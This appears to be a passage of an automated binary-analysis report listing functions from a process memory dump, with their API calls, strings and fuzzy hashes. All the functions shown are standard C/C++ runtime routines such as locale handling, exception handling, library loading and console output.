                                                                                                                                                                      • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                                                                                                                                      • API String ID: 3255926029-3252031757
                                                                                                                                                                      • Opcode ID: 7ae8db01b808dd89840a75df8cabf87d40bbb11ba067a80d5ff1f2e4a99f70d4
                                                                                                                                                                      • Instruction ID: d05ed137bdea5c458c7773acbbbc2e04d8b31775992ad2a394b8293493ff55d0
                                                                                                                                                                      • Opcode Fuzzy Hash: 7ae8db01b808dd89840a75df8cabf87d40bbb11ba067a80d5ff1f2e4a99f70d4
                                                                                                                                                                      • Instruction Fuzzy Hash: 10314060918A47A0E784EBDCE8017E0AB25FB44344FC14433D04D761A59FBCAA69C362
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D63720, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 255COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                      • API String ID: 459529453-1866435925
                                                                                                                                                                      • Opcode ID: 5f5df7f7e40a59f312fc8a143b46a986f631a95f737e9221bd87bb5ff3ae644f
                                                                                                                                                                      • Instruction ID: af9ecd9d1d4b5868b6aa0baaebdaa07a717b05e7cc6e7eaa8fe06e71f2c29ef9
                                                                                                                                                                      • Opcode Fuzzy Hash: 5f5df7f7e40a59f312fc8a143b46a986f631a95f737e9221bd87bb5ff3ae644f
                                                                                                                                                                      • Instruction Fuzzy Hash: F6B1B132A09E8185EBA4EF95D4403B9BBA0FB84B84F944137DAAD237A5CF3CD445C752
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D66A70, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 151COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                      • String ID: bad locale name$false$true
                                                                                                                                                                      • API String ID: 4121308752-1062449267
                                                                                                                                                                      • Opcode ID: 1883a582b6bff787cff5b330a0cd1b3edb92caeee22c469266d388372aeb76fc
                                                                                                                                                                      • Instruction ID: 30b771b21a1d6382044a7b0056d3c68102d708e8e9b76e7cdf567d67ac02180a
                                                                                                                                                                      • Opcode Fuzzy Hash: 1883a582b6bff787cff5b330a0cd1b3edb92caeee22c469266d388372aeb76fc
                                                                                                                                                                      • Instruction Fuzzy Hash: 5B619062A09B4286EB91EFA0D4503BCBBA0EF41744F854136EA4D77A95DF3CE456C321
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D6D0BC, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                      • API String ID: 3606184308-393685449
                                                                                                                                                                      • Opcode ID: ad7ed73937a1dd237070555565f728518e44f666302cee83b44181870f8f7486
                                                                                                                                                                      • Instruction ID: cbda567ccce721e0fc9aa32b96bc755e63c9b75f4039166ba27cbb274616da4e
                                                                                                                                                                      • Opcode Fuzzy Hash: ad7ed73937a1dd237070555565f728518e44f666302cee83b44181870f8f7486
                                                                                                                                                                      • Instruction Fuzzy Hash: 23D18272A08F4186EBA0EFA5E4403ADBBA0FB45788F900136DE6D67B55CF38E550C712
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D84680, Relevance: 10.8, APIs: 7, Instructions: 291COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 65c67ee29b172f3aaf2071a4a3b55cc142d5f95449ac71a6ce88a5a1d0bc4fff
                                                                                                                                                                      • Instruction ID: fc7e5b54136aea083a681c52184aa1045e0f7bd3fc1c8418e8b862ca996a3430
                                                                                                                                                                      • Opcode Fuzzy Hash: 65c67ee29b172f3aaf2071a4a3b55cc142d5f95449ac71a6ce88a5a1d0bc4fff
                                                                                                                                                                      • Instruction Fuzzy Hash: 82C1E462A0C68285EBA2FB9590403BDEFA0FB41B84FC54136DA4D2B791DE7CF455C362
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D6F8CC, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7E3D6FB7A,?,?,?,00007FF7E3D6F7F4,?,?,?,?,00007FF7E3D6B8CD), ref: 00007FF7E3D6F94F
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7E3D6FB7A,?,?,?,00007FF7E3D6F7F4,?,?,?,?,00007FF7E3D6B8CD), ref: 00007FF7E3D6F95D
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7E3D6FB7A,?,?,?,00007FF7E3D6F7F4,?,?,?,?,00007FF7E3D6B8CD), ref: 00007FF7E3D6F987
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7E3D6FB7A,?,?,?,00007FF7E3D6F7F4,?,?,?,?,00007FF7E3D6B8CD), ref: 00007FF7E3D6F9CD
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7E3D6FB7A,?,?,?,00007FF7E3D6F7F4,?,?,?,?,00007FF7E3D6B8CD), ref: 00007FF7E3D6F9D9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                      • Opcode ID: b761e5433ce2450e37b89b641fd627801baa61bd38bef159c72b63580617267b
                                                                                                                                                                      • Instruction ID: b9b5872aeeaadfd4002245bd60b895c56bffed91103cd2d65ddef2cc4c80eb56
                                                                                                                                                                      • Opcode Fuzzy Hash: b761e5433ce2450e37b89b641fd627801baa61bd38bef159c72b63580617267b
                                                                                                                                                                      • Instruction Fuzzy Hash: 8031CA62A1AE42A1EE91EB92A400779AB98BF44B94FD90537DD2D1B340DE3CE0458322
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D8A254, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                      • Opcode ID: 17aa42be1855e8293f7d7b9052321d776abf8ab5934ab8638aae0abb00b52cbe
                                                                                                                                                                      • Instruction ID: babcd9a5af60a83333e61e21c7a5abef26d02532ecc6fda21bef126df1bc6f2c
                                                                                                                                                                      • Opcode Fuzzy Hash: 17aa42be1855e8293f7d7b9052321d776abf8ab5934ab8638aae0abb00b52cbe
                                                                                                                                                                      • Instruction Fuzzy Hash: 7D11B421718A41C6E390EB92F844329EBA0FB48FE4F904235E95E97790DF3CE5548751
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D6A6EC, Relevance: 9.2, APIs: 6, Instructions: 203COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiStringWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2829165498-0
                                                                                                                                                                      • Opcode ID: 0ea3efd0d96233e8bf874a7ad7a2cc7a21ce19e72c17bfd768373a6dad6ab731
                                                                                                                                                                      • Instruction ID: 5c957fad64006460bb959a6b6dc2921a80b3743e5f11e816af9f6762056d376c
                                                                                                                                                                      • Opcode Fuzzy Hash: 0ea3efd0d96233e8bf874a7ad7a2cc7a21ce19e72c17bfd768373a6dad6ab731
                                                                                                                                                                      • Instruction Fuzzy Hash: FC8184B2608B4186EBA0DF9194403B9BBA1FB44BA4F950237EAAD67BC4DF3CD4058711
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D66410, Relevance: 9.1, APIs: 6, Instructions: 91COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2081738530-0
                                                                                                                                                                      • Opcode ID: f03270646cd50eae441d6e570d09acc80cf4af85bf9899de021a018538877541
                                                                                                                                                                      • Instruction ID: edffdbe2306baa6613cf6f54a000ab8c2183d084b5455252f6b1ac1469a8f41e
                                                                                                                                                                      • Opcode Fuzzy Hash: f03270646cd50eae441d6e570d09acc80cf4af85bf9899de021a018538877541
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E31B971A0CE4181EAA1FB91E540379EB60FB44B94F880533EA6D637A9DF3CE451C722
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D68700, Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2081738530-0
                                                                                                                                                                      • Opcode ID: e442c3c5f32b225f9bfd1fcd874e039e77c952d174d73c7182559b48d446be9e
                                                                                                                                                                      • Instruction ID: 272b80ee929cc2e3e21ec0579d788ba4d34541f3eee09dc48a746efcb79d128a
                                                                                                                                                                      • Opcode Fuzzy Hash: e442c3c5f32b225f9bfd1fcd874e039e77c952d174d73c7182559b48d446be9e
                                                                                                                                                                      • Instruction Fuzzy Hash: 0231B625A08E5280EB91FB95E540379EB60FF44B94F980533DA6D23795DF3CE452C322
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D6D584, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                      • API String ID: 3523768491-393685449
                                                                                                                                                                      • Opcode ID: 7dfd4bda0c3efe84babe414968b57461c88ce9cb546e615a3c9a8c7545501632
                                                                                                                                                                      • Instruction ID: cd4697c5545c583ef7669ca5b44ee9b3e75e6fb7f5ec8cc3f9205d75afa5d5fe
                                                                                                                                                                      • Opcode Fuzzy Hash: 7dfd4bda0c3efe84babe414968b57461c88ce9cb546e615a3c9a8c7545501632
                                                                                                                                                                      • Instruction Fuzzy Hash: B9E1D472908B818AE790EFA9E4403ADBFE0FB45748F910137DAAD67655CF38E485C712
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D720AC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                      • Opcode ID: 355763e493dad6538389df0793eed467e39f6892aaedefc02179b19105f30a0b
                                                                                                                                                                      • Instruction ID: a48f4946feedbdc6112dc398952077a5d3f1ca211fac1a4b1cca0d35eefca6cc
                                                                                                                                                                      • Opcode Fuzzy Hash: 355763e493dad6538389df0793eed467e39f6892aaedefc02179b19105f30a0b
                                                                                                                                                                      • Instruction Fuzzy Hash: B4F05461B19682C1FBD4EB90E4D0374EB50AF84B41F841037D90F5A561DE7CE48CC721
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D6C98C, Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                                                      • Opcode ID: 718134ce9e332f23656d71c396ac408a803ba87032f76a2a13b0102232623a57
                                                                                                                                                                      • Instruction ID: 1fafd477029b7552dd60440d506465a748a43cb6a52bafe9c5223aba3e118d12
                                                                                                                                                                      • Opcode Fuzzy Hash: 718134ce9e332f23656d71c396ac408a803ba87032f76a2a13b0102232623a57
                                                                                                                                                                      • Instruction Fuzzy Hash: 3BB1B622A09E4681EAE5FF969440338EF90EF44F84F858437DE6D27796DE3CE4418362
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D834B4, Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E3D834F6
                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7E3D83473,?,?,FFFFFFFE,00007FF7E3D83EB2), ref: 00007FF7E3D835B4
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7E3D83473,?,?,FFFFFFFE,00007FF7E3D83EB2), ref: 00007FF7E3D8363E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2210144848-0
                                                                                                                                                                      • Opcode ID: a98c3a2d31644f2f566c4bb38b19cf0d62c00298df2419fbc97fda4ba4da40a1
                                                                                                                                                                      • Instruction ID: 554bcdba76e4575e569f97648028e36a03ed24d1bc92803b02987b6189c64262
                                                                                                                                                                      • Opcode Fuzzy Hash: a98c3a2d31644f2f566c4bb38b19cf0d62c00298df2419fbc97fda4ba4da40a1
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A818166E1864285E791EFA988417BCAE60FB44B84FC44133DA0E6B795DE3CF445C722
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D623B0, Relevance: 7.7, APIs: 5, Instructions: 187COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1087005451-0
                                                                                                                                                                      • Opcode ID: 67962fba6ee768d3bd46e37f5e2b2ec5cc75d89a070fa04924a12c5c9a474b8a
                                                                                                                                                                      • Instruction ID: 11593dcc033c013a498502f9132aff2b44abe546d01e1cab826ab80d3f9e65b2
                                                                                                                                                                      • Opcode Fuzzy Hash: 67962fba6ee768d3bd46e37f5e2b2ec5cc75d89a070fa04924a12c5c9a474b8a
                                                                                                                                                                      • Instruction Fuzzy Hash: 0B71E222B14F4185FB40EFA5D0503ACA761EB547A8F808236DE6D26BD5DF38E1958351
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D7C48C, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                      • Opcode ID: 09467e227c6f763a2ca8e31c9d578d3e99d2a4337f8899ac365743204cab12c4
                                                                                                                                                                      • Instruction ID: 7c2d3d4ee383fd6c0c4f9540009ec34f7559bb5a30579f39fef4a031492f2857
                                                                                                                                                                      • Opcode Fuzzy Hash: 09467e227c6f763a2ca8e31c9d578d3e99d2a4337f8899ac365743204cab12c4
                                                                                                                                                                      • Instruction Fuzzy Hash: 2F51FB23D089464DF6B2FFB8945037AEA60BF44395F944237E95E3B5E4DF3CA4818622
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D88F40, Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                      • Opcode ID: eaed8dfff0f68ad8df544ac5f149add81e04ab95f19dfb156c94115c05b10cc8
                                                                                                                                                                      • Instruction ID: 9e75e64443dcd623802031bcb6443bb2e05afd7a0d208e4104a9ee17ad5087be
                                                                                                                                                                      • Opcode Fuzzy Hash: eaed8dfff0f68ad8df544ac5f149add81e04ab95f19dfb156c94115c05b10cc8
                                                                                                                                                                      • Instruction Fuzzy Hash: 4311C122E1CA1351F6D4B1E8E4463799C53AF98371E880636E96E2F6DACE3CB9504122
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D6DC98, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
